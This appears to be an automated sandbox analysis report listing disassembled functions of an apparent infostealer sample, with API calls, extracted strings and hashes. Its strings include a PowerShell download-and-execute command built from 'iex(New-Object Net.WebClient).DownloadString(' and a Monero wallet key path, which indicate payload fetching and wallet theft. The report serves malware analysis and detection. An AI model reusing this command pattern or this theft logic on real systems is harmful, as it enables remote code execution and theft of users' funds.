                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: e7d42812be2b302b1667c7bbf5bd9c3f2318088e095a6835fcac33652c5e339d
                              • Instruction ID: 289f39f8aeca7655e23f2932d85c032cc528c2455dffd837726e9432b0d9c872
                              • Opcode Fuzzy Hash: e7d42812be2b302b1667c7bbf5bd9c3f2318088e095a6835fcac33652c5e339d
                              • Instruction Fuzzy Hash: E72127B1A44208ABDB14DFD5CC49FAEB7B9EB48B00F104659F705BB280C77869098BA5
                              Function 00BF83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BF8426
                              • wsprintfA.USER32 ref: 00BF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF8499
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,009BE9D0,00000000,000F003F,?,00000400), ref: 00BF84EC
                              • lstrlen.KERNEL32(?), ref: 00BF8501
                              • RegQueryValueExA.ADVAPI32(00000000,009BEA18,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C00B34), ref: 00BF8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: f4c53f8de5d7b796f68c427df4743adb3d42086176ea76565866c84316d61f94
                              • Instruction ID: 9b2d45cf22d9b22c8b5531dfbc19e8490c6e87093eb9cafb2ea7bbb80a57a9d5
                              • Opcode Fuzzy Hash: f4c53f8de5d7b796f68c427df4743adb3d42086176ea76565866c84316d61f94
                              • Instruction Fuzzy Hash: 6921D8B191021CAFDB28DB54DC85FE9B7B8FB48700F04C5E9A609A6140DF716A8ACF94
                              Function 00BF7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,009ABAD0,00000000,00020119,00000000), ref: 00BF76DD
                              • RegQueryValueExA.ADVAPI32(00000000,009BE970,00000000,00000000,?,000000FF), ref: 00BF76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 4db9bac4d39641831728f246937adb6602ebe0a2cb451fb3601af82b89b66a9c
                              • Instruction ID: 74fa9e40de2811d572315f60b667d3fd8ad4cc6286992a8bf2bf9717c86c67c7
                              • Opcode Fuzzy Hash: 4db9bac4d39641831728f246937adb6602ebe0a2cb451fb3601af82b89b66a9c
                              • Instruction Fuzzy Hash: CC018FB4A40208BFEB24EBE5DC4DF7DB7B8EB08701F1040A4FB04E7290DA7099098B51
                              Function 00BF7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF773B
                              • RegOpenKeyExA.ADVAPI32(80000002,009ABAD0,00000000,00020119,00BF76B9), ref: 00BF775B
                              • RegQueryValueExA.ADVAPI32(00BF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BF777A
                              • RegCloseKey.ADVAPI32(00BF76B9), ref: 00BF7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: a9b4693d9b36726d326eb99f6dc4a42ae7db47ce5ed326a88dcfd98cf3853b2c
                              • Instruction ID: 1f74895895f8bf65b8461b7b97c9ba353db69fe39d9f2f27f6ed155d12009c29
                              • Opcode Fuzzy Hash: a9b4693d9b36726d326eb99f6dc4a42ae7db47ce5ed326a88dcfd98cf3853b2c
                              • Instruction Fuzzy Hash: 140144B5A40308BFDB14DBE1DC4AFAEB7B8EB44700F1045A5FA05A7281DA7059058B51
                              Function 00BE99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                              • LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: a74f6ac488aa13bf0ad58e650c276f2cf6981d73a6035603d6f1a971ec7dd5a6
                              • Instruction ID: 2a5ab0388dfd71f779a1c89df2af092bf8f8b4f655ad7efdc711948e2bee95b5
                              • Opcode Fuzzy Hash: a74f6ac488aa13bf0ad58e650c276f2cf6981d73a6035603d6f1a971ec7dd5a6
                              • Instruction Fuzzy Hash: B7312DB4A00209EFDB24CF96D985FAE77F5FF48340F1081A8E915A7290D774A949CFA1
                              Function 00BF4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,009BEE20), ref: 00BF47DB
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4801
                              • lstrcat.KERNEL32(?,?), ref: 00BF4820
                              • lstrcat.KERNEL32(?,?), ref: 00BF4834
                              • lstrcat.KERNEL32(?,009AA910), ref: 00BF4847
                              • lstrcat.KERNEL32(?,?), ref: 00BF485B
                              • lstrcat.KERNEL32(?,009BDF60), ref: 00BF486F
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BF8D90: GetFileAttributesA.KERNEL32(00000000,?,00BE1B54,?,?,00C0564C,?,?,00C00E1F), ref: 00BF8D9F
                                • Part of subcall function 00BF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BF4580
                                • Part of subcall function 00BF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00BF4587
                                • Part of subcall function 00BF4570: wsprintfA.USER32 ref: 00BF45A6
                                • Part of subcall function 00BF4570: FindFirstFileA.KERNEL32(?,?), ref: 00BF45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 003229a62005a8fbb71324198c62cff75f10eaabe3d970c4f3692e215ff0614f
                              • Instruction ID: 5f31e5fe3ff319dcf29f43cc8fbde084999e2c1aec60d291021c90734125cd16
                              • Opcode Fuzzy Hash: 003229a62005a8fbb71324198c62cff75f10eaabe3d970c4f3692e215ff0614f
                              • Instruction Fuzzy Hash: 0B3155B690020C5BCB24F7A0DC86EFD73BCAB58700F4445D9B319A7091DEB4D68D8B95
                              Function 00BF2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF2D85
                              Strings
                              • ')", xrefs: 00BF2CB3
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BF2D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BF2CC4
                              • <, xrefs: 00BF2D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 67a75e99c9ab22d3a9f5a956eb9649ae7c823dd132819a9d604afd2de9f7e23a
                              • Instruction ID: c4e169f30445f9e99c0583fd80dcc088f4d655b5b805e5e376cfe19bde110856
                              • Opcode Fuzzy Hash: 67a75e99c9ab22d3a9f5a956eb9649ae7c823dd132819a9d604afd2de9f7e23a
                              • Instruction Fuzzy Hash: 2441B2B1C1010C9ADB18FBA4C891BFDB7B4AF14340F5081A9E61AB7195DFB46A4ECF91
                              Function 00BE9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00BE9F41
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: ac29cd356ab6d36ef9281b902226343e9fedaa7f5f8256af2c6b4faaed6b6f90
                              • Instruction ID: 1174fdb06f9a7a0feb3b8c94c094f514dd2f2c62c6dd52bb5411192b37544728
                              • Opcode Fuzzy Hash: ac29cd356ab6d36ef9281b902226343e9fedaa7f5f8256af2c6b4faaed6b6f90
                              • Instruction Fuzzy Hash: 07612F70A1024CDBDB28EFA5CC96FED77F9AF44340F108558FA0A5B192EB706A09CB51
                              Function 00BF40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,009BDE80,00000000,00020119,?), ref: 00BF40F4
                              • RegQueryValueExA.ADVAPI32(?,009BED60,00000000,00000000,00000000,000000FF), ref: 00BF4118
                              • RegCloseKey.ADVAPI32(?), ref: 00BF4122
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4147
                              • lstrcat.KERNEL32(?,009BED18), ref: 00BF415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 4db23a7ad258b08ddf1d2c80af9e7696de25db5b1305cbfbc28f2efdfa618af2
                              • Instruction ID: 3baeafb753dd300c56ee80950d0d5902bebe677f0d875a0a32151dce1a650a66
                              • Opcode Fuzzy Hash: 4db23a7ad258b08ddf1d2c80af9e7696de25db5b1305cbfbc28f2efdfa618af2
                              • Instruction Fuzzy Hash: 70419CB6D00108ABDB24FBA0DC46FFE73BDAB58700F044998B71557181EA755B8D8BE2
                              Function 00BF6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00BF696C
                              • sscanf.NTDLL ref: 00BF6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BF69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BF69C0
                              • ExitProcess.KERNEL32 ref: 00BF69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
